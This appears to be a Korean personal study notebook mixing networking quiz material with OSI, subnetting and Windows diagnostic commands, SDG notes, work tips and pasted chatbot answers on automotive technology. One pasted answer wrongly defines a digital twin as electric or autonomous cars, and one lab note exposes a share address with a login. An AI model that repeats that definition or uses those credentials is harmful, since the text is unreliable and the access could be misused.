추가로 디지털 리터러시 교육을 위해 공공도서관 담당사서들은 사서의 디지털 역량과 이를 위한 재교육을 가장 중요하게 생각하고 있었고 디지털 리터러시 교육 프로그램 운영에 적합한 도서관 시설과 최신 장비 도입, 시기적절한 다양한 프로그램 개발과 홍보의 중요성도 함께 제기하였다.- https://koreascience.kr/article/JAKO201810237885803.pdf

-한국문헌정보학회 https://accesson.kr/kslis/

https://accesson.kr/kslis/v.52/1/359/9508


네트워크 구성 5요소- https://elky.tistory.com/129 / https://tae-yeong.tistory.com/66

1. 호스트 (Host)
일반적인 PC나, 서버, 또는 WIFI등을 이용한 소형 무선 기기가 될 수도 있습니다.

2. NIC (Network Interface Card)
네트워크 카드라 불리는 이 장치는, 단말기에 연결되어 데이터를 송수신 하는 역할을 합니다.
흔히 랜카드(이더넷 카드)라 불리는 장비입니다.

3. 중계기 (Repeater 또는 Regenerator)
중계기란 잡음등으로 약해진 신호를 원래의 비트로 재생하는 역할을 해주는 장치입니다. 특정 거리마다 중계기가 존재해야만 신호가 유실되지 않고 전송될 수 있습니다.

4. 브리지 (Bridge)
브리지는 네트워크를 작은 단위로 분할 할 때 사용 됩니다.

5. 라우터 (Router)
네트워크 주소(IP)를 이용해서 데이터를 최적의 경로로 찾아가게 해주는 장치입니다.

6. 게이트웨이 (Gateway)
서로 다른 프로토콜을 이용하는 네트워크 간의 연결을 위해 사용됩니다.

7. 허브 (Hurb)
네트워크 장비들 끼리의 연결을 위해 사용되는 장치입니다. 연결된 장비들 간에 신호 분배 기능도 갖고 있습니다.

8. IP 공유기
네트워크에서 컴퓨터를 구별하려면 IP가 필요합니다. IP하나를 여러개 컴퓨터가 사용하기 위해서는, 각 컴퓨터 마다 사설 IP를 부여하고, 외부 IP를 통해서 주고 받는 데이터를, 각 사설 IP에 적절히 분배해주어야 합니다.

이 기능을 하는 것이 IP 공유기입니다. NAT (Network Address Translation )장비라 불리기도 합니다.

출처: https://elky.tistory.com/129 [엘키의 주절 주절:티스토리]


- OSI 7 LAYER(통신표준)-OSI 7 계층은 국제표준화기구(ISO)에서 1984년에 발표한 정보통신업체 간의 장비 호환성을 위한 표준 프로토콜입니다. OSI(Open Systems Interconnection) 모델은 컴퓨터 네트워크 프로토콜 디자인과 통신을 계층으로 나누어 설명한 모델로, 컴퓨터 네트워킹을 위한 범용 언어를 제공합니다. 

https://ko.wikipedia.org/wiki/OSI_%EB%AA%A8%ED%98%95

계층 1: 물리 계층-(Physical)/ 리피터, HUB

계층 2: 데이터 링크 계층-(Data Link)/브리지, 스위치

계층 3: 네트워크 계층-(Network)/라우터(L3 스위치)

계층 4: 전송 계층-(Transport)

계층 5: 세션 계층-(Session)

계층 6: 표현 계층-(Presentation)

계층 7: 응용 계층-(Application)


◆ 핵심요약

▶IP Address 이해

-Class 주소 체계는 A class, B class, C class, D class로 class로 나눈다.

- 네트워크 주소와 호스트 주소가 결합되어 있다.

- 네트워크 주소와 호스트 주소 구분을 서브넷마스크로 표시한다.

▶ 서브넷팀 이해

-서브넷팅은 브로트캐스트 패킷 양을 줄여 성능과 서비스 관리, 문제 해결을 위한 더 나은 관리 환경을 제공한다.

-호스트 비트를 서브넷 비트로 빌려서 네트워크를 나눈다.

-서브넷팅후에 IP주소 할당은 서브넷마스크값이 달라진다.

▶ 네트워크 통신 흐름 이해

-같은 네트워크 내의 통신은 목적지 IP주소에 대한 MAC Address를 찾아오는 ARP로 시작한다.

-다른 네트워크 와의 통신은 게이트웨이 IP주소에 대한 MAC Address를 찾아오는 ARP가 동작한다.



◆문제풀기

문제 1) IP 주소는 Network address와 Host Address로 구분됩니다. 다음 중 IP network address는 어떤 것인가?

Host Address 부분이 모두 1인 경우

Host Address 부분이 모두 0인 경우

Network Address 부분이 모두 1인 경우

Network Address 부분이 모두 0인 경우

문제 2) 192.168.1.33/27 라는 IP의 네트워크 주소는 무엇인가?

192.168.1.0

192.168.1.33

192.168.1.32

192.168.0.0

문제 3) 다음중 라우터의 동작없이 동일한 네트워크에서 두 IP간에 통신이 되는 것은?

192.168.1.1255.255.255.0192.168.2.1255.255.255.0

172.46.1.1 255.255.255.0-172.46.2.0255.255.255.0

172.16.1.1 255.255.0.0-172.16.2.2 255.255.0.0

192.168.1.1 255.255.255.252-192.168.1.254255.255.255.252

문제 4) 다음 중 192.168.1.111/27라는 IP가 소속되어 있는 네트워크 주소와 브로드캐스트 주소를 잘 찍지어 놓은 것은?

192.168.1.32 192.168.1.127

192.168.1.64 192.168.1.127

192.168.1.96 192.168.1.127

192.168.1.128 192.168.1.127

문제 5) 다른 네트워크와의 통신에 대한 설명이 맞는 것은 무엇인가?

①ARP는 목적지 IP의 MAC Address를 찾는다.

② ARP는 게이트웨이 IP의 MAC Address를 찾는다.

③RARP는 목적지 IP의 MAC Address를 찾는다.

④RARP는 게이트웨이 IP의 MAC Address를 찾는다.


=================


p.48

◆문제풀기- 정답 볼드체

문제 1) MAC address 캐시 확인 명령은 무엇인가요?

arp-a

arp-d

maca

mac-d

문제 2) DNS 캐시 삭제 명령은 무엇인가요?

arpa

arp-d

ipconfig/displaydns

ipconfig/flushdns

문제 3) 현재 컴퓨터의 이더넷 어댑터 물리적인 주소를 확인하려면 어떤 명령을 사용하나요?

arp-a

arp-d

ipconfig

ipconfig/all

문제 4) ping 명령을 이용하여 5000byte 데이터 전송을 패킷 조각화 없이 전송하는 명령은 무엇인가요?

ping-f-w 5000 203.241.132.34

ping -15000 203.241.132.34

ping-w 5000 203.241.132,34,

ping-f-15000 203.241.132.34

문제 5) 목적지까지 라우터 경로를 추적하기 위하여 이름없이 ip 주소만 나타내려고 합니다. 명령은 무엇인가요 2

ping-d 203.241.132.34

tracert 203.241.132.34

tracert -d 203.241.132.34

ping 203.241.132.34


P.110

◆문제풀기

문제 1) 1. OS 계층 중에서 인터네트워크상에서 신뢰성 있는 데이터 전송이 이루어지는가 등의 문제에 관련되어 있는 계층으로 가심 회선의 구축, 유지 및 종료, 전송 오류 검출 및 복구

그리고 정보흐름 제어의 경차를 제공할 수 있는 계층은?

① 애플리케이션 총 (Application layer)

② 프리젠테이션 총 (Presentation layer)

③ 세션충 (Session layer)

④트랜스포트 층 (Transport layer)


문제 2) OSI 모델의 Network 계층에서 동작하는 장치는 무엇인가?

① gateway

②repeater

③ bridge

④router


문제 3) 다음과 같은 특징을 가지고 있는 OSi 7 layer의 계층은?

•Data의 형태 결정, 구성 •구문변환 •압축, 암호화

① 애플리케이션 층 (Application layer)

② 프리젠테이션 총 (Presentation layer)

③ 세션층 (Session layer)

④ 트랜스포트 층 (Transport layer)


문제 4) Data Link 계층의 PDU를 무엇이라 하는가?

① Frame

② Packet

③ Segment

④ Message


문제 5) 경로선택, 라우팅, 논리적인 주소를 정하는 계층으로 논리적인 주소를 사용하여 Network 주소를 관리하고 최적의 경로로 사용자의 Packet을 전송하는 기능을 담당하는 계층은 무엇인가요?

① 네트워크 층 (Network layer)

② 프리젠테이션 층 (Presentation layer)

③ 세션 총 (Session layer)

④ 트랜스포트 층 (Transport layer)



p.149

◆문제풀기

문제 1) 다음 중 udp의 특징이 아닌 것은?

connectionless 전송

신뢰성 있는 데이터 전송 보장

빠른 전송

overhead가 적다.


문제 2) 다음 중 ARP의 역할은 무엇인가?

① 원격지 컴퓨터의 IP 정보를 알아온다.

②내 컴퓨터의 MAC 정보를 알아온다.

③ 원격지 컴퓨터의 MAC 정보를 알아온다.

④ 내 컴퓨터의 IP 정보를 알아온다.


문제 3) TCP/IP 각 계층의 상위 연결정보가 아닌 것은 무엇인가요?

IP + Checksum

IP + Protocol ID

TCP + port number

UDP + port number


문제 4) 다음 중 TCP에 대한 설명이 아닌 것은?

①Connection을 형성하기 위해 3WAY handshake를 사용한다.

② 모든 segment에는 sequence #가 부여된다.

③TCP는 unicast로만 전송된다.

④sequence #는 항상 1번부터 시작한다.


문제 5) 다음 중 ICMP에 관한 설명 중 맞지 않는 것은?

time exceeded는 IP header에 있는 TTL field의 값이 0이 되었을 때 전달된다

destination unreachable은 목적지로 가는 경로를 모르거나, 목적지 호스트, 목적지 서비스가 없는 등과 같은 상황에서 발생된다.

Redirect message는 IP 주소를 다시 요청할 때 사용된다.

echo request/reply는 상대 호스트와의 연결 상태를 확인하기 위해 사용된다.



p110.

◆문제풀기

문제 1) 1. OSI 계층 중에서 인터네트워크상에서 신뢰성 있는 데이터 전송이 이루어지는가 등의 문제에 관련되어 있는 계층으로 가상 회선의 구축, 유지 및 종료, 전송 오류 검출 및 복구

그리고 정보흐름 제어의 절차를 제공할 수 있는 계층은?

애플리케이션 (Application layer)

프리젠테이션 총 (Presentation layer)

세션층 (Session layer)

트랜스포트 층 (Transport layer)


문제 2) OSI 모델의 Network 계층에서 동작하는 장치는 무엇인가?

gateway

repeater

bridge

router


문제 3) 다음과 같은 특징을 가지고 있는 OSI 7 layer의 계층은?

•Data의 형태 결정, 구성 •구문변환  •압축, 암호화

① 애플리케이션 층 (Application layer)

② 프리젠테이션 총 (Presentation layer)

③ 세션층 (Session layer)

④ 트랜스포트 층 (Transport layer)


문제 4) Data Link 계층의 PDU를 무엇이라 하는가?

Frame

Packet

Segment

Message


문제 5) 경로선택, 라우팅, 논리적인 주소를 정하는 계층으로 논리적인 주소를 사용하여 Network 주 소를 관리하고 최적의 경로로 사용자의 Packet을 전송하는 기능을 담당하는 계층은 무엇인가요?

① 네트워크 층 (Network layer)

② 프리젠테이션 층 (Presentation layer)

③ 세션층 (Session layer)

④ 트랜스포트 층 (Transport layer)


1. 자신의 컴퓨터 설정 정보를 쓰세요.=>제어판 /관리자권한프롬프트 에서 확인

- IP address:

- Gateway:

- DNS:


2. 내 컴퓨터 공유 자원을 확인하는 명령을 쓰세요. net share


3. 내 컴퓨터 공유 자원에 연결한 사용자를 확인하는 명령을 쓰세요. net session


4. 내 컴퓨터에 등록된 계정을 확인하는 명령을 쓰세요. net user


5. 내 컴퓨터 OS 종류를 확인하고 메모리 용량을 확인할 수 있는 명령은 무엇인가요? systeminpo


6. 내 컴퓨터 DNS 캐시를 확인과 삭제하는 명령을 쓰세요. ipconfig / displaydns

 ipconfig / flushdns


7. 내 컴퓨터 MAC ADDRESS 캐시를 삭제하는 명령을 무엇이라고 하는가?

arp -a  ///  arp -d


8. 같은 네트워크에 연결된 것은 무엇인가요?b. 정답

a. 10.1.1.10/255.255.255.0---10.2.2.10/255.255.255.0

   (10.1.1.10) -- (10.2.2.10)   지역번호

b. 200.1.1.100/255.255.255.0 200.1.1.200/255.255.255.0

c. 192.168.0.1/255.255.255.0-192.168.1.1/255.255.255.0

d. 100.1.1.1/255.255.0.0---100.2.2.1/255.255.0.0


9. 현재 로그온 사용자계정을 확인하는 명령은 무엇인가요?


10. TCP/IP 등록정보를 확인하는 명령은 무엇인가요? ipconfig /all

------

>ping 8.8.8.8

>tracert 8.8.8.8

>

11. 강사 pc 연결방법 -네트워크 공유 폴더 연결하는 경로 \\210.181.141.32

id:edu32  /// pw:1234





영어 한마디 - ENGLISH / 블로그 작성-BLOG /

블로그 주제선정부터 글쓰기까지 해결방법 

- https://youtube.com/watch?v=v3SmcB9v3Pc&si=rkidaXVX-JJplm4r

영어 왕초보, 1주일이면 탈출가능합니다. 

- https://youtube.com/watch?v=oVz88JNB3sI&si=nO729giSvU3mx8vm

통기타 음악 https://mail.google.com/mail/u/0/#inbox/KtbxLxGrWKHWrqnKhQKDzhFmcLzqmVsTNB?projector=1



일타사수 업무력노트 / UN기구의 SDG이니셔티브

[그림 2-9] 목표를 포함한 UN기구의 SDG이니셔티브 시각화 자료

출처: UN(2023). The 17 GOALS. https://sdgs.un.org/goals에서 2023. 6. 10. 검색.

 DEVELOPMENT GALS

NO 1 POVERTY

2 ERGE HUNGER

3 GOOD HEALTH AND WELL-BEING

4 QUALITY EDUCATION

5 GENDER EQUALITY

6 CLEAN WATERO AND SANITATION

7 AFFORDABLE AND CLEAN ENERGY

8 DECENT WORK AND ECONOMIC GROWTH

M

9 INDUSTRY, INNOVATION AND INFRASTRUCTURE

10 NEQUALITIES REDUCED

=

11 SUSTAINABLE CITIES AND COMMUNITIES

12 RESPONSIBLE CONSUMPTION AND PRODUCTION

13 CLIMATE

14 BELOW WATER

15 ON LAND LIFE

16 PEACE, JUSTICE AND STRONG INSTITUTIONS

17 PARTNERSHIPS FOR THE GOALS

SUSTAINABLE DEVELOPMENT GOALS

일타사수 업무력노트

01

페이스 지키기

업무에 효율적으로 집중하기 위해 서는 계획을 세우는 것이 우선이다. 계획을 짜고 동료에게 자신의 계획 을 공유하면 마음 편히 효율적으로 업무에 집중할 수 있다.

03

자신의 역량 객관적으로 보기

'주어진 시간 동안 일을 끝낼 수 있 는가'에 대해 빠르게 판단해야 한나. 그러기 위해서는 자신의 업무 속도, 업무적 장단짐 등 특성을 파악한 뒤 합리적인 계획을 세우는 것이 좋다.

05

시간 낭비 줄이기

때로는 모르는 내용을 솔직하게 물 어볼 용기도 필요하다. 모르는게 생 기면 최대한 아는 내용까지 이야기 하거나, 다시 물어 질문의 배경과 요 지를 파악해 보자.

02

업무 계획 피드백하기

협업이 필요할 때는 동료의 업무 계 획도 함께 고려해야 한다. 내 일이 곧 동료에게도 이어질 경우에는 서 로의 데드라인과 일의 순서에 대해 소통하고 일정에 반영해야 한다.

04

데드라인 조정은 미리

데드라인을 조성해야 하는 경우 늦 어도 하루 진에는 미리 알리는 것이 좋다. 또한, 상대방이 이해할 수 있 도록 납득할 만한 상당, 불가피한 이 유를 함께 덧붙이도록 하자.

06

보고는 두괄식으로

결과부터 말하면 듣는 사람은 답을 들었기에 다음 설명을 들을 준비를 하게 된다. 그렇기에 나의 노력을 어 필힐 내는 간단히 결과를 먼저 이야 기한 후 그 과정을 말하도록 하자

2024년 12월 19일 목요일

기타9 / 계약업무 일반(1)_지방계약원칙 / 미리캔버스 사용법 기초 / 웹디자인 관련 용어 총정리

 


계약업무 일반(1)_지방계약원칙https://youtu.be/DQAh7_o4x_4?si=penbMsjMel3lk7oK

 

 

 

윈도우11 작업표시줄 날짜 시간에 요일 표시하는 방법

https://youtu.be/IIl2EYQXzUQ?si=Gwwq7ei0qRZdSV_U

 

 

미리캔버스 사용법 기초! 미리캔버스 하나로 상세페이지 뚝딱! 하는법

https://youtu.be/SW7euCjjp5c?si=jkuTdFLfzn3NV_S8

 

 

웹디자이너라면 알고 있어야 할 웹디자인 관련 용어 총정리!

https://youtu.be/23WcIKqHxew?si=KSv9IMrV2nigGAiR



- ELECTRIC POWER        SYSTEM의 이해

- HV POWER SYSTEM 이해


- LV POWER SYSTEM 이해

- ELECTRIC LOAD ALALYSIS 작성

- LIGHTING SYSTEM 설계


- LV ELECTRICAL INSTALLATION PROTECTION

- 방폭 이해 및 ELECTRIC EQUIPMENT    

자동차 디지털 트윈- 자율주행?

 


자동차 디지털 트윈-디지털 트윈은 자동차 산업에서 주로 사용되는 용어로, 디지털 기술과 전통적인 자동차 기술이 결합된 형태를 의미합니다. 이는 자동차의 성능, 안전성, 편의성을 높이기 위해 디지털 기술을 도입하여 전통적인 자동차 기술과 결합하는 것을 말합니다.

예를 들어, 디지털 트윈 자동차는 다음과 같은 특징을 가질 수 있습니다:

  • 전기차: 전통적인 내연 기관차와 달리 전기 모터를 사용하여 구동합니다.

  • 자율 주행 기술: 자동차가 스스로 주행할 수 있도록 하는 디지털 기술입니다.

  • 디지털 조종 장치: 전통적인 조종 장치와 달리 디지털 스타일의 조종 장치를 사용합니다.

  • 디지털 안전 기술: 자동차의 안전성을 높이기 위해 디지털 기술을 활용합니다.

이와 같은 디지털 트윈 기술은 자동차 산업의 미래를 개척하는 중요한 요소로 여겨집니다. 더 궁금한 점이 있으신가요?


자동차 디지털 트윈은 자동차의 물리적 상태와 동작을 디지털로 복제하여 실시간으로 모니터링하고 분석할 수 있게 하는 기술입니다. 이 기술은 다양한 형태로 사용될 수 있으며, 몇 가지 주요 유형은 다음과 같습니다:


1. **제품 디지털 트윈 (Product Digital Twin)**: 자동차의 설계 및 제조 단계에서 사용되는 디지털 복제본으로, 제품 개발 주기의 최적화를 위해 사용됩니다. 설계 변경이 필요한 부분을 신속하게 파악할 수 있습니다.


2. **프로세스 디지털 트윈 (Process Digital Twin)**: 자동차의 생산 및 조립 프로세스를 실시간으로 모니터링하고 최적화하는 데 사용됩니다. 생산 라인의 효율성을 높이고 품질 문제를 사전에 발견할 수 있습니다.



3. **성능 디지털 트윈 (Performance Digital Twin)**: 자동차의 운행 데이터를 실시간으로 수집하고 분석하여 성능을 모니터링합니다. 이를 통해 차량의 상태를 점검하고, 예측 유지보수를 계획할 수 있습니다.


4. **소비자 디지털 트윈 (Consumer Digital Twin)**: 자동차 소유자나 운전자의 행동 및 사용 패턴을 분석하여 맞춤형 서비스를 제공하는 데 사용됩니다. 개인화된 유지보수 및 서비스 제안을 통해 소비자 만족도를 높일 수 있습니다.


5. **안전 디지털 트윈 (Safety Digital Twin)**: 차량의 안전 시스템과 관련된 데이터를 분석하여 사고 예방 및 대응 방안을 마련하는 데 사용됩니다. 실시간 데이터 분석을 통해 위험 상황을 미리 감지하고 대응할 수 있습니다.


디지털 트윈 기술은 자동차 산업의 모든 단계에서 다양한 방식으로 적용될 수 있으며, 이를 통해 제품의 품질, 생산 효율성, 운행 안전성 및 소비자 만족도를 크게 향상시킬 수 있습니다. 더 알고 싶은 부분이나 다른 주제에 대해 이야기해 보고 싶으신가요? 😊


Sensor Fusion을 사용한 위치 추정의 주요 종류와 방법은 다음과 같습니다:

  1. 칼만 필터 (Kalman Filter): 이동체의 위치와 속도를 실시간으로 추정하는 데 사용됩니다. 센서 데이터를 결합하여 최적의 추정 값을 제공합니다.

  2. 확장 칼만 필터 (Extended Kalman Filter, EKF): 비선형 시스템에서도 사용할 수 있는 칼만 필터의 확장 버전입니다.

  3. 입자 필터 (Particle Filter): 복잡하고 비선형 시스템에서 사용되며, 여러 입자를 이용하여 위치를 추정합니다.

  4. SLAM (Simultaneous Localization and Mapping): 이동체가 동시에 자신의 위치를 추정하고 주변 환경을 매핑하는 기술입니다. 주로 로봇과 드론에서 사용됩니다.

  5. Visual Odometry: 카메라 이미지를 사용하여 이동체의 이동 거리와 방향을 추정합니다.

  6. Inertial Odometry: 가속도계와 자이로스코프를 사용하여 이동체의 이동 거리와 방향을 추정합니다.

  7. Hybrid Odometry: 여러 센서를 결합하여 위치 추정을 수행합니다. 예를 들어, Visual Odometry와 Inertial Odometry를 결합하여 더 정확한 결과를 얻을 수 있습니다.

이러한 방법들은 각각의 장단점을 가지고 있으며, 사용하는 환경과 목적에 따라 적합한 방법을 선택할 수 있습니다. 더 궁금한 점이 있으신가요?


자동차 IOT?

자동차 IoT는 자동차와 인터넷을 연결하여 데이터를 주고받는 기술입니다. 이를 통해 자동차는 다양한 센서와 기기를 통해 데이터를 수집하고, 이를 분석하여 운전자에게 정보를 제공하고, 자동차의 성능을 최적화할 수 있습니다. 예를 들어, 자동차 IoT는 위치 추적, 소음 감지, 차량 상태 모니터링 등을 가능하게 합니다.

자동차 IoT는 또한 전기차 충전 인프라 관리통합된 교통 관리 시스템에도 활용될 수 있습니다. 이러한 기술은 운전자의 경험을 향상시키고, 안전성을 높이는 데 큰 기여를 하고 있습니다.






자동차 전면 유리 제상(Defrost/De-icing) 성능”**을 ANSYS Fluent로 해석 ///

도움말  좋은 화면 캡처예요 👍 이 이미지는 ANSYS Fluent → Setup 단계의 General 화면 이고, **“해석의 뼈대(종류·시간·좌표계)를 결정하는 곳”**입니다. 아래에서 화면에 보이는 기능을 영역별로 정확히 설명할게요. 🔧 ...